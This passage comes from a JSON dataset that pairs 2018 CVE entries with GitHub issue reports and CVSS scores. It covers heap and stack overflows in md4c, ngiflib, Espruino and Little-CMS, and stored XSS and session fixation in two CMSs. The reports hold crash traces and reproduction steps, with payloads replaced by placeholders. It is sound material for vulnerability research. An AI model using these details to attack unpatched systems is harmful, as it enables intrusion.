  19821. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19822. "severity": "CRITICAL",
  19823. "baseScore": 9.8,
  19824. "impactScore": 5.9,
  19825. "exploitabilityScore": 3.9
  19826. },
  19827. {
  19828. "CVE_ID": "CVE-2018-11536",
  19829. "Issue_Url_old": "https://github.com/mity/md4c/issues/36",
  19830. "Issue_Url_new": "https://github.com/mity/md4c/issues/36",
  19831. "Repo_new": "mity/md4c",
  19832. "Issue_Created_At": "2018-05-28T16:35:09Z",
  19833. "description": "Multiple vulnerabilities in md4c. Multiple vulnerabilities in md4c There are multiple vulnerabilities in md4c (git repository: URLTAG Latest commit NUMBERTAG e2a5c on Apr NUMBERTAG git log commit APITAG Author: Martin Mitas < EMAILTAG rg> Date: Thu Apr NUMBERTAG Heap buffer overflow in APITAG command: ./md2html testfile testcase: URLTAG It seems like that an overflow happened in APITAG in APITAG memcpy(dummy, mark, sizeof(MD_MARK)); APITAG provided information as below NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a NUMBERTAG at pc NUMBERTAG dd7f5 bp NUMBERTAG ffedcfedc NUMBERTAG sp NUMBERTAG ffedcfed3e0 WRITE of size NUMBERTAG at NUMBERTAG a NUMBERTAG thread T NUMBERTAG dd7f4 in __asan_memcpy PATHTAG NUMBERTAG dd3 in md_split_simple_pairing_mark PATHTAG NUMBERTAG dd3 in APITAG PATHTAG NUMBERTAG in md_analyze_marks PATHTAG NUMBERTAG c9c8 in md_analyze_link_contents PATHTAG NUMBERTAG c9c8 in md_analyze_inlines PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG e7f7 in md_process_leaf_block PATHTAG NUMBERTAG e7f7 in md_process_all_blocks PATHTAG NUMBERTAG e7f7 in md_process_doc PATHTAG NUMBERTAG cb in md_parse PATHTAG NUMBERTAG a7a8 in md_render_html PATHTAG NUMBERTAG cc in process_file PATHTAG NUMBERTAG cc in main PATHTAG NUMBERTAG f NUMBERTAG c6fc NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG a NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG a NUMBERTAG is a wild pointer. 
SUMMARY: APITAG heap buffer overflow PATHTAG in __asan_memcpy Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG a NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING Heap buffer overflow in APITAG command: ./md2html testfile testcase: URLTAG It seems like that mark variable access a restricted area of memory in APITAG while(!(mark >flags & MD_MARK_RESOLVED) || mark >beg APITAG NUMBERTAG c3c7fff NUMBERTAG fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG 
c3c7fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  19834. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19835. "severity": "CRITICAL",
  19836. "baseScore": 9.8,
  19837. "impactScore": 5.9,
  19838. "exploitabilityScore": 3.9
  19839. },
  19840. {
  19841. "CVE_ID": "CVE-2018-11545",
  19842. "Issue_Url_old": "https://github.com/mity/md4c/issues/39",
  19843. "Issue_Url_new": "https://github.com/mity/md4c/issues/39",
  19844. "Repo_new": "mity/md4c",
  19845. "Issue_Created_At": "2018-05-29T15:41:50Z",
  19846. "description": "Heap buffer overflow in APITAG command: ./md2html testfile testcase: URLTAG APITAG provided information as below: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b1 at pc NUMBERTAG ff NUMBERTAG bp NUMBERTAG fff NUMBERTAG be8d0 sp NUMBERTAG fff NUMBERTAG be8c8 WRITE of size NUMBERTAG at NUMBERTAG b1 thread T NUMBERTAG ff NUMBERTAG in md_merge_lines PATHTAG NUMBERTAG ff NUMBERTAG in md_merge_lines_alloc PATHTAG NUMBERTAG ff NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in md_end_current_block PATHTAG NUMBERTAG c7f7 in md_process_doc PATHTAG NUMBERTAG cb in md_parse PATHTAG NUMBERTAG a7a8 in md_render_html PATHTAG NUMBERTAG cc in process_file PATHTAG NUMBERTAG cc in main PATHTAG NUMBERTAG fda NUMBERTAG a NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG a NUMBERTAG in _start ( PATHTAG NUMBERTAG b1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG de NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG e NUMBERTAG f in md_merge_lines_alloc PATHTAG NUMBERTAG e NUMBERTAG f in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in md_end_current_block PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in md_merge_lines Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa 
fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  19847. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19848. "severity": "CRITICAL",
  19849. "baseScore": 9.8,
  19850. "impactScore": 5.9,
  19851. "exploitabilityScore": 3.9
  19852. },
  19853. {
  19854. "CVE_ID": "CVE-2018-11546",
  19855. "Issue_Url_old": "https://github.com/mity/md4c/issues/38",
  19856. "Issue_Url_new": "https://github.com/mity/md4c/issues/38",
  19857. "Repo_new": "mity/md4c",
  19858. "Issue_Created_At": "2018-05-29T15:41:25Z",
  19859. "description": "Heap buffer overflow in APITAG command: ./md2html testfile testcase: URLTAG APITAG provided information as below NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f at pc NUMBERTAG c6 bp NUMBERTAG ffe NUMBERTAG e1b NUMBERTAG sp NUMBERTAG ffe NUMBERTAG e1b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f thread T NUMBERTAG c5 in md_is_named_entity_contents PATHTAG NUMBERTAG c5 in md_is_entity_str PATHTAG NUMBERTAG b NUMBERTAG in md_build_attribute PATHTAG NUMBERTAG f9 in md_enter_leave_span_a PATHTAG NUMBERTAG d2 in md_process_inlines PATHTAG NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e7f7 in md_process_leaf_block PATHTAG NUMBERTAG e7f7 in md_process_all_blocks PATHTAG NUMBERTAG e7f7 in md_process_doc PATHTAG NUMBERTAG cb in md_parse PATHTAG NUMBERTAG a7a8 in md_render_html PATHTAG NUMBERTAG cc in process_file PATHTAG NUMBERTAG cc in main PATHTAG NUMBERTAG fd6be7ec NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG a NUMBERTAG in _start ( PATHTAG NUMBERTAG f is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG de NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG bedb in md_merge_lines_alloc PATHTAG NUMBERTAG bedb in md_is_inline_link_spec_helper PATHTAG NUMBERTAG b9bf in md_is_inline_link_spec PATHTAG NUMBERTAG b9bf in md_resolve_links PATHTAG NUMBERTAG b9bf in md_analyze_inlines PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in md_is_named_entity_contents Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fb NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG 
fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  19860. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19861. "severity": "CRITICAL",
  19862. "baseScore": 9.8,
  19863. "impactScore": 5.9,
  19864. "exploitabilityScore": 3.9
  19865. },
  19866. {
  19867. "CVE_ID": "CVE-2018-11547",
  19868. "Issue_Url_old": "https://github.com/mity/md4c/issues/37",
  19869. "Issue_Url_new": "https://github.com/mity/md4c/issues/37",
  19870. "Repo_new": "mity/md4c",
  19871. "Issue_Created_At": "2018-05-29T15:40:53Z",
  19872. "description": "Heap buffer overflow in APITAG command: ./md2html testfile testcase: URLTAG APITAG provided information as below: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG e1e4 bp NUMBERTAG ffdf NUMBERTAG ab NUMBERTAG sp NUMBERTAG ffdf NUMBERTAG ab NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG e1e3 in APITAG PATHTAG NUMBERTAG d5 in APITAG PATHTAG NUMBERTAG d5 in APITAG PATHTAG NUMBERTAG d5 in md_end_current_block PATHTAG NUMBERTAG c7f7 in md_process_doc PATHTAG NUMBERTAG cb in md_parse PATHTAG NUMBERTAG a7a8 in md_render_html PATHTAG NUMBERTAG cc in process_file PATHTAG NUMBERTAG cc in main PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG a NUMBERTAG in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ded NUMBERTAG in realloc PATHTAG NUMBERTAG b NUMBERTAG in md_push_block_bytes PATHTAG NUMBERTAG b NUMBERTAG in md_start_new_block PATHTAG NUMBERTAG b NUMBERTAG in md_process_line PATHTAG NUMBERTAG b NUMBERTAG in md_process_doc PATHTAG NUMBERTAG cb in md_parse PATHTAG NUMBERTAG a7a8 in md_render_html PATHTAG NUMBERTAG cc in process_file PATHTAG NUMBERTAG cc in main PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG c2a7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG c2a7fff NUMBERTAG c2a7fff NUMBERTAG c2a7fff NUMBERTAG c2a7fff NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG 
a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  19873. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19874. "severity": "CRITICAL",
  19875. "baseScore": 9.8,
  19876. "impactScore": 5.9,
  19877. "exploitabilityScore": 3.9
  19878. },
  19879. {
  19880. "CVE_ID": "CVE-2018-11548",
  19881. "Issue_Url_old": "https://github.com/EOSIO/eos/issues/3497",
  19882. "Issue_Url_new": "https://github.com/eosio/eos/issues/3497",
  19883. "Repo_new": "eosio/eos",
  19884. "Issue_Created_At": "2018-05-28T17:04:20Z",
  19885. "description": "Limit P2P Connections from Same IP. To prevent DOS attacks against public endpoints we need to limit the number of connections from the same IP.",
  19886. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  19887. "severity": "HIGH",
  19888. "baseScore": 7.5,
  19889. "impactScore": 3.6,
  19890. "exploitabilityScore": 3.9
  19891. },
  19892. {
  19893. "CVE_ID": "CVE-2018-11549",
  19894. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/139",
  19895. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/139",
  19896. "Repo_new": "wuzhicms/wuzhicms",
  19897. "Issue_Created_At": "2018-05-29T03:54:23Z",
  19898. "description": "There is a Stored XSS vulnerability in Account Settings > Member Centre APITAG information > Ordinary member. Version: wuzhicms NUMBERTAG Steps to Reproduce NUMBERTAG register an account and log in to the backstage URLTAG NUMBERTAG Go to Account Settings > Member Centre APITAG information > Ordinary member Fill in the QQ number FILETAG NUMBERTAG add the following payload to QQ Forms and click \u201csubmit\u201d APITAG APITAG FILETAG POST request data\uff1a _ CODETAG _ FILETAG APITAG Account Settings in Account Management to view FILETAG Stored XSS triggered ...",
  19899. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  19900. "severity": "MEDIUM",
  19901. "baseScore": 5.4,
  19902. "impactScore": 2.7,
  19903. "exploitabilityScore": 2.3
  19904. },
  19905. {
  19906. "CVE_ID": "CVE-2018-11555",
  19907. "Issue_Url_old": "https://github.com/mm2/Little-CMS/issues/167",
  19908. "Issue_Url_new": "https://github.com/mm2/little-cms/issues/167",
  19909. "Repo_new": "mm2/little-cms",
  19910. "Issue_Created_At": "2018-05-28T12:34:05Z",
  19911. "description": "Some bugs in CMS. There are some bugs in the latest commit of CMS. Some of the bugs could be exploited to execute code. one of the debug info as follows: ===== Program received signal SIGSEGV, Segmentation fault. [ stack NUMBERTAG fffffffe NUMBERTAG ffff7b NUMBERTAG c2c APITAG mov r NUMBERTAG QWORD PTR [rb NUMBERTAG fffffffe NUMBERTAG c NUMBERTAG fffffffe NUMBERTAG b NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG e NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff NUMBERTAG in NUMBERTAG ffff NUMBERTAG in NUMBERTAG ffff7b NUMBERTAG c2c in APITAG (p NUMBERTAG in NUMBERTAG e NUMBERTAG out NUMBERTAG APITAG APITAG Stride NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG ffff7b NUMBERTAG in APITAG APITAG APITAG APITAG APITAG at ../. PATHTAG NUMBERTAG ac7 in APITAG APITAG out NUMBERTAG d0, in=<optimized out>, APITAG at PATHTAG NUMBERTAG APITAG APITAG out>, out=<optimized out>, in=<optimized out>) at PATHTAG NUMBERTAG main (argc=argc APITAG APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG fe NUMBERTAG in __libc_start_main (main NUMBERTAG APITAG , argc NUMBERTAG arg NUMBERTAG fffffffeba8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffeb NUMBERTAG at PATHTAG NUMBERTAG e NUMBERTAG in _start () __main NUMBERTAG APITAG GDB NUMBERTAG may not support required Python API Description: Segmentation fault on program counter Short description: APITAG NUMBERTAG Hash: APITAG Exploitability Classification: EXPLOITABLE Explanation: The target tried to access data at an address that matches the program counter. This is likely due to the execution of a branch instruction (ex: 'call') with a bad argument, but it could also be due to execution continuing past the end of a memory region or another cause. Regardless this likely indicates that the program counter contents are tainted and can be contro lled by an attacker. 
Other tags: APITAG NUMBERTAG the commit have been tested is APITAG please see the following url for the bugs info and POCs: URLTAG",
  19912. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19913. "severity": "HIGH",
  19914. "baseScore": 7.8,
  19915. "impactScore": 5.9,
  19916. "exploitabilityScore": 1.8
  19917. },
  19918. {
  19919. "CVE_ID": "CVE-2018-11571",
  19920. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/486",
  19921. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/486",
  19922. "Repo_new": "clippercms/clippercms",
  19923. "Issue_Created_At": "2018-05-30T10:58:15Z",
  19924. "description": "Session Fixation. Clipper CMS NUMBERTAG is vulnerable to session fixation attack. APITAG Session Fixation attack fixes an established session on the victim's browser, so the attack starts before the user logs in. APITAG Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application. APITAG authenticating a user, it doesn\u2019t assign a new session ID, making it possible to use an existent session ID. APITAG attack consists of obtaining a valid session ID (e.g. by connecting to the application), inducing a user to authenticate himself with that session ID, and then hijacking the user validated session by the knowledge of the used session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it. Let's see the session values before login FILETAG FILETAG Session Values after Login FILETAG FILETAG Mitigation: APITAG ID must be renewed after authentication (i.e) session must be different before authentication and after authentication. APITAG application should not accept user supplied cookie value (i.e)session value.",
  19925. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19926. "severity": "HIGH",
  19927. "baseScore": 8.8,
  19928. "impactScore": 5.9,
  19929. "exploitabilityScore": 2.8
  19930. },
  19931. {
  19932. "CVE_ID": "CVE-2018-11572",
  19933. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/485",
  19934. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/485",
  19935. "Repo_new": "clippercms/clippercms",
  19936. "Issue_Created_At": "2018-05-30T10:45:35Z",
  19937. "description": "Stored XSS in Module name field. Stored XSS is found in the APITAG name\" field in CMS Clipper NUMBERTAG APITAG module name value is obtained from the user,it is getting saved and displayed without any sanitation. Affected URL: URLTAG Steps to reproduce: APITAG Modules choose Manage modules >edit APITAG the XSS payload in APITAG name field and save it. APITAG script is getting executed and results in stored cross site scripting attack. For your reference: FILETAG FILETAG FILETAG FILETAG Mitigation: Strong Input validation has to be performed for all the entry APITAG encode all dynamic data before embedding it in the web page. Encoding should be context sensitive. URLTAG",
  19938. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  19939. "severity": "MEDIUM",
  19940. "baseScore": 5.4,
  19941. "impactScore": 2.7,
  19942. "exploitabilityScore": 2.3
  19943. },
  19944. {
  19945. "CVE_ID": "CVE-2018-11575",
  19946. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/4",
  19947. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/4",
  19948. "Repo_new": "miniupnp/ngiflib",
  19949. "Issue_Created_At": "2018-05-30T09:47:48Z",
  19950. "description": "stack buffer overflow ngiflib c NUMBERTAG asan report ERRORTAG poc: FILETAG",
  19951. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19952. "severity": "CRITICAL",
  19953. "baseScore": 9.8,
  19954. "impactScore": 5.9,
  19955. "exploitabilityScore": 3.9
  19956. },
  19957. {
  19958. "CVE_ID": "CVE-2018-11576",
  19959. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/6",
  19960. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/6",
  19961. "Repo_new": "miniupnp/ngiflib",
  19962. "Issue_Created_At": "2018-05-30T09:50:09Z",
  19963. "description": "heap buffer overflow ngiflib c NUMBERTAG asan report ERRORTAG poc: FILETAG",
  19964. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19965. "severity": "CRITICAL",
  19966. "baseScore": 9.8,
  19967. "impactScore": 5.9,
  19968. "exploitabilityScore": 3.9
  19969. },
  19970. {
  19971. "CVE_ID": "CVE-2018-11577",
  19972. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/582",
  19973. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/582",
  19974. "Repo_new": "liblouis/liblouis",
  19975. "Issue_Created_At": "2018-05-30T09:52:20Z",
  19976. "description": "SEGV logging c NUMBERTAG asan report ERRORTAG poc: FILETAG",
  19977. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19978. "severity": "HIGH",
  19979. "baseScore": 8.8,
  19980. "impactScore": 5.9,
  19981. "exploitabilityScore": 2.8
  19982. },
  19983. {
  19984. "CVE_ID": "CVE-2018-11578",
  19985. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/5",
  19986. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/5",
  19987. "Repo_new": "miniupnp/ngiflib",
  19988. "Issue_Created_At": "2018-05-30T09:48:58Z",
  19989. "description": "SEGV ngiflib c NUMBERTAG asan report ERRORTAG poc: FILETAG",
  19990. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19991. "severity": "MEDIUM",
  19992. "baseScore": 6.5,
  19993. "impactScore": 3.6,
  19994. "exploitabilityScore": 2.8
  19995. },
  19996. {
  19997. "CVE_ID": "CVE-2018-11590",
  19998. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1427",
  19999. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1427",
  20000. "Repo_new": "espruino/espruino",
  20001. "Issue_Created_At": "2018-05-19T07:41:46Z",
  20002. "description": "stack overflow error. We found with our fuzzer a stack overflow when the input file contains many parentheses. ERRORTAG sample input file: FILETAG",
  20003. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20004. "severity": "MEDIUM",
  20005. "baseScore": 5.5,
  20006. "impactScore": 3.6,
  20007. "exploitabilityScore": 1.8
  20008. },
  20009. {
  20010. "CVE_ID": "CVE-2018-11591",
  20011. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1420",
  20012. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1420",
  20013. "Repo_new": "espruino/espruino",
  20014. "Issue_Created_At": "2018-05-18T05:53:47Z",
  20015. "description": "Invalid read on APITAG We found with our fuzzer on Linu NUMBERTAG bit an invalid read error on a null pointer in APITAG APITAG It seems that it results from a failed sanity check on array buffer. Address sanitizer output: ERRORTAG crash input files: FILETAG FILETAG",
  20016. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20017. "severity": "MEDIUM",
  20018. "baseScore": 5.5,
  20019. "impactScore": 3.6,
  20020. "exploitabilityScore": 1.8
  20021. },
  20022. {
  20023. "CVE_ID": "CVE-2018-11592",
  20024. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1421",
  20025. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1421",
  20026. "Repo_new": "espruino/espruino",
  20027. "Issue_Created_At": "2018-05-18T05:59:01Z",
  20028. "description": "Invalid read on APITAG We found with our fuzzer multiple invalid read errors in APITAG APITAG Asan results are like: ERRORTAG crash input files: FILETAG FILETAG FILETAG",
  20029. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20030. "severity": "MEDIUM",
  20031. "baseScore": 5.5,
  20032. "impactScore": 3.6,
  20033. "exploitabilityScore": 1.8
  20034. },
  20035. {
  20036. "CVE_ID": "CVE-2018-11593",
  20037. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1426",
  20038. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1426",
  20039. "Repo_new": "espruino/espruino",
  20040. "Issue_Created_At": "2018-05-19T07:29:01Z",
  20041. "description": "stack buffer overflows during exception handling. We found with our fuzzer some stack buffer overflows during error handling. ERRORTAG sample input files: FILETAG FILETAG",
  20042. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20043. "severity": "HIGH",
  20044. "baseScore": 7.1,
  20045. "impactScore": 5.2,
  20046. "exploitabilityScore": 1.8
  20047. },
  20048. {
  20049. "CVE_ID": "CVE-2018-11594",
  20050. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1434",
  20051. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1434",
  20052. "Repo_new": "espruino/espruino",
  20053. "Issue_Created_At": "2018-05-21T13:06:46Z",
  20054. "description": "Stack overflow error. We found another stack overflow error on APITAG that is different from NUMBERTAG The input file is rather contrived (due to fuzzing) but it can be triggered without address sanitizer. sample input file: FILETAG gdb backtrace: ERRORTAG gdb backtrace file (full): FILETAG",
  20055. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20056. "severity": "MEDIUM",
  20057. "baseScore": 5.5,
  20058. "impactScore": 3.6,
  20059. "exploitabilityScore": 1.8
  20060. },
  20061. {
  20062. "CVE_ID": "CVE-2018-11595",
  20063. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1425",
  20064. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1425",
  20065. "Repo_new": "espruino/espruino",
